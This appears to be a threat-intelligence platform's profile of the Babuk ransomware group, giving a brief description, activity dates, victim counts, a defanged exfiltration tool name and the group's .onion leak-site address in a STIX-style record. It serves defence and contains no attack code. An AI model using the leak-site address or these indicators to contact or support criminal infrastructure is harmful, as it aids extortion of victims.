Threat Actor Profile
Low Cybercriminal
Description

Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.

Confidence Score
100%
Tags
ransomware ransomware.live
First Seen

Unknown

Last Updated

Unknown

Active Status
Active
Created

April 29, 2026

Indicators of Compromise

Loading IOCs…

IOC KQL for Sentinel
STIX Data 
{'added_date': None,
 'client': '2003264@sit.singaporetech.edu.sg',
 'description': 'Babuk Ransomware is a sophisticated ransomware compiled for '
                'several platforms. Windows and ARM for Linux are the most '
                'used compiled versions, but ESX and a 32bit old PE executable '
                'were observed over time. as well It uses an Elliptic Curve '
                'Algorithm (Montgomery Algorithm) to build the encryption '
                'keys.\n',
 'firstseen': '2020-10-25T00:00:00+00:00',
 'group': 'babuk',
 'has_negotiations': True,
 'has_ransomnote': False,
 'lastseen': '2021-07-27T17:24:57+00:00',
 'locations': [{'available': False,
                'fqdn': 'nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion',
                'slug': 'http://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion/',
                'title': 'Babuk - Leaks site',
                'type': 'DLS'}],
 'negotiation_count': 2,
 'ransomnotes_count': 0,
 'tiaras_metadata': {'has_negotiations': True,
                     'has_ransomnote': False,
                     'locations': [{'available': False,
                                    'fqdn': 'nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion',
                                    'slug': 'http://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion/',
                                    'title': 'Babuk - Leaks site',
                                    'type': 'DLS'}],
                     'negotiation_count': 2,
                     'ransomnotes_count': 0,
                     'ransomware_live_group': 'babuk',
                     'tools': {'CredentialTheft': [],
                               'DefenseEvasion': [],
                               'DiscoveryEnum': [],
                               'Exfiltration': ['File[.]io'],
                               'LOLBAS': [],
                               'Networking': [],
                               'Offsec': [],
                               'RMM-Tools': []},
                     'url': 'https://www.ransomware.live/group/babuk',
                     'victims': 8,
                     'vulnerabilities': []},
 'tiaras_source': 'ransomware.live',
 'tools': {'CredentialTheft': [],
           'DefenseEvasion': [],
           'DiscoveryEnum': [],
           'Exfiltration': ['File[.]io'],
           'LOLBAS': [],
           'Networking': [],
           'Offsec': [],
           'RMM-Tools': []},
 'ttps': [],
 'url': 'https://www.ransomware.live/group/babuk',
 'victims': 8,
 'vulnerabilities': []}
Quick Actions
Back to Threat Actors
Dashboard Home